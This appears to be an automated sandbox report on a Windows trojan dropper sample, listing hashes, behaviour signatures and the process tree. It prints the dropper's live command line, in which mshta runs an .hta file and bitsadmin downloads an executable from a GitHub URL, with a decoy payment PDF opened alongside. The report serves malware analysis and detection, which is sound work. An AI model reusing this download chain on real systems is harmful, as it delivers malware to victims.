Analysis
-
max time kernel
122s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
26/03/2025, 17:26
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe
Resource
win7-20241010-en
General
-
Target
SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe
-
Size
100KB
-
MD5
05a3652e22ffa7e85b65473182acb707
-
SHA1
24e4c3464f0c4a3ebf46bd0e8d0a39bd2e9f0a55
-
SHA256
9a97ef498ea1fcbe247efd79e293fcadb8b523c334762dcec53d8fb178e7c807
-
SHA512
dd7f6c0d0f8ef063bc67bf08140975b02623e484e492bd93062cc0327ebce9d6d6d6dd7b654ac6e768a3cdd0ef5463674434064c0db8578fd0ab0702e226c4e2
-
SSDEEP
3072:Ku8cDKY2SgVmoXU/F+Vy54GCfcljji03L:K/DVSqE/FYgs6
Malware Config
Signatures
-
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 1976 bitsadmin.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AcroRd32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1560 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 1560 AcroRd32.exe 1560 AcroRd32.exe 1560 AcroRd32.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2368 wrote to memory of 1936 2368 SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe 30 PID 2368 wrote to memory of 1936 2368 SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe 30 PID 2368 wrote to memory of 1936 2368 SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe 30 PID 2368 wrote to memory of 1936 2368 SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe 30 PID 2368 wrote to memory of 1560 2368 SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe 31 PID 2368 wrote to memory of 1560 2368 SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe 31 PID 2368 wrote to memory of 1560 2368 SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe 31 PID 2368 wrote to memory of 1560 2368 SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe 31 PID 1936 wrote to memory of 1976 1936 mshta.exe 32 PID 1936 wrote to memory of 1976 1936 mshta.exe 32 PID 1936 wrote to memory of 1976 1936 mshta.exe 32 PID 1936 wrote to memory of 1976 1936 mshta.exe 32
Processes
-
C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\successfulpayment.hta"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Windows\SysWOW64\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/ruthmooregmuax/ruthmooregmuax/raw/refs/heads/main/system.exe C:\Users\Admin\AppData\Local\Temp\system.exe3⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:1976
-
-
-
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\successfulpayment.pdf"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1560
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD59ec5722f5c211aa092627523eededaee
SHA1acce645d722eb5ca3357abe6f21982fc9d0a7d01
SHA2561c2bc9d43cb50547bea4b7b22f8491ee131fe995ced4fff7dc096535a499de7a
SHA512e1604b7c32fa6ff8014096c137f57f27feebd5bc45fbba0128d71346eb3f739397993c4ee4f0b5d9fe9e5be80283218f00a801ccd366fdac0082704eccc9c2d9
-
Filesize
884B
MD5168db1ea9ff342afc28adab5c01bd159
SHA1063357780b0e0a82f36670ce59be818c1eb75012
SHA2561c3a2840f2d8d1730a52f2498c58e86fb6a70199d347cb57e300bb2110ef85e6
SHA51293e87e9f1ef123dc6e476933e08d6d94917c05ef2355eb2f0e75bf6cd832e26a4386742bd66cd7a89c07d832f60f3fba90522cefe92909c03627688c0e5b4cf0
-
Filesize
89KB
MD5609c3fe620acd93745b01a2115dfb2ea
SHA18552ce163f5bdd8e729091416f961d2e3cff53d1
SHA256be1c0ba85aa8a85432f3e8764517a8aec6e34dcbc807f6f122b9f2895ba2b850
SHA51296b9ab8f4fd84980b75760279273d815b7ec16b9ef6a0582c5bb539f3a58a6430f5208089203f341755b0821f3c29144f509b5f285e97bd1af4d9dc9361de344